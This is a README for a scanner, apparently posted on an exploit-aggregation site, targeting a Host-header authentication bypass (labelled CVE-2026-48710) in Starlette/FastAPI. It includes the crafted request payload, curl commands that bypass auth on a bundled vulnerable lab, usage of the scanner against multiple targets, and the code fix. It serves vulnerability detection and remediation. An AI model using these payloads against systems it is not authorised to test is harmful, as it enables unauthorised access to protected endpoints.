Share
## https://sploitus.com/exploit?id=2BD05E53-56D6-5376-821B-9F1C5CF31FD0
# BadHost โ€” CVE-2026-48710 Scanner

Detection-only scanner for the **BadHost** auth-bypass in Starlette / FastAPI โ€” where auth middleware reads `request.url.path` instead of `request.scope["path"]`, allowing a crafted `Host` header to smuggle an allowlisted path and bypass authentication.

```
GET /admin HTTP/1.1
Host: api.internal/health?__badhost=
# Starlette sees request.url.path == "/health" โ†’ allowed
# ASGI still routes to /admin โ†’ bypassed
```

**Affected:** Starlette โ‰ค 0.46.1 / FastAPI โ‰ค 0.115.x  
**Fixed in:** Starlette 0.46.2+

---

## Features

- Loads endpoints from a FastAPI/OpenAPI JSON or YAML spec (file or URL)
- Auto-discovers unauthenticated paths to use as injection candidates
- Tests both `Host` and `X-Forwarded-Host` carriers, two payload strategies
- Built-in presets for AI/LLM (`--preset ai`) and MCP (`--preset mcp`) endpoints
- Output: text summary, `--json`, `--csv`
- Live scan progress to stderr; zero third-party dependencies

---

## Local Vulnerable Lab (`badhost_vuln_lab/`)

Ships with two FastAPI apps for local validation:

| App | URL | Auth reads |
|-----|-----|-----------|
| Vulnerable | `http://127.0.0.1:8000` | `request.url.path` โ€” bypassed |
| Fixed | `http://127.0.0.1:8001` | `request.scope["path"]` โ€” safe |

```bash
cd badhost_vuln_lab
docker compose up --build
```

Or without Docker:

```bash
pip install -r badhost_vuln_lab/requirements.txt
uvicorn badhost_vuln_lab.app_vulnerable:app --host 127.0.0.1 --port 8000
uvicorn badhost_vuln_lab.app_fixed:app --host 127.0.0.1 --port 8001
```

### Manual bypass test

```bash
curl -i http://127.0.0.1:8000/admin                               # 403
curl -i -H "Host: 127.0.0.1:8000/health?x=" http://127.0.0.1:8000/admin  # 200 โ€” bypassed
curl -i -H "Host: 127.0.0.1:8001/health?x=" http://127.0.0.1:8001/admin  # 403 โ€” fixed
```

---

## Installation

```bash
git clone https://github.com/Bhanunamikaze/BadHost-CVE-2026-48710-Exploit.git
cd BadHost-CVE-2026-48710-Exploit
python badhost_openapi_scanner.py --help   # Python 3.9+, no pip install needed
```

---

## Usage

```bash
# Read-only scan from local openapi.json
python badhost_openapi_scanner.py http://api.internal:8000 --openapi ./openapi.json

# Include write methods (staging/authorized only)
python badhost_openapi_scanner.py http://api.internal:8000 \
  --openapi ./openapi.json --openapi-methods all \
  --unsafe-allow-write --openapi-body-mode invalid

# Fetch OpenAPI directly from the target
python badhost_openapi_scanner.py http://api.internal:8000 \
  --openapi http://api.internal:8000/openapi.json

# Multiple targets, CSV output
python badhost_openapi_scanner.py --targets-file targets.txt \
  --openapi ./openapi.json --csv > results.csv

# AI/LLM + MCP preset paths (no OpenAPI needed)
python badhost_openapi_scanner.py http://api.internal:8000 --preset all
```

> `--openapi-body-mode invalid` sends `{}` for write methods โ€” triggers FastAPI `422` after auth bypass without executing the endpoint. A `baseline=403 test=422` result is still a **SUSPECT** finding worth investigating.  
> Do **not** use `--openapi-body-mode minimal` on production โ€” it builds valid request bodies that may execute write endpoints.

---

## Verdicts

| Verdict | Meaning |
|---------|---------|
| `CONFIRMED` | Baseline 401/403 โ†’ test 2xx. **Vulnerable.** |
| `SUSPECT` | Baseline 401/403 โ†’ test 404/405/422. Auth gate appears bypassed; verify manually. `422` from FastAPI is especially significant. |
| `REJECTED` | Proxy rejected malformed Host (400/421) before bypass |
| `BLOCKED` | Crafted request still denied |
| `OPEN` | Already accessible without auth โ€” not this CVE |

Only `CONFIRMED` and `SUSPECT` appear in output. Exit code `2` = CONFIRMED, `1` = SUSPECT, `0` = clean.

---

## Remediation

```python
# Vulnerable
if request.url.path.startswith("/public"):
    ...

# Fixed
if request.scope["path"].startswith("/public"):
    ...
```

Upgrade to **Starlette 0.46.2+** / **FastAPI 0.116.0+**.

---

**For authorized testing only. Only scan systems you own or have explicit permission to test.**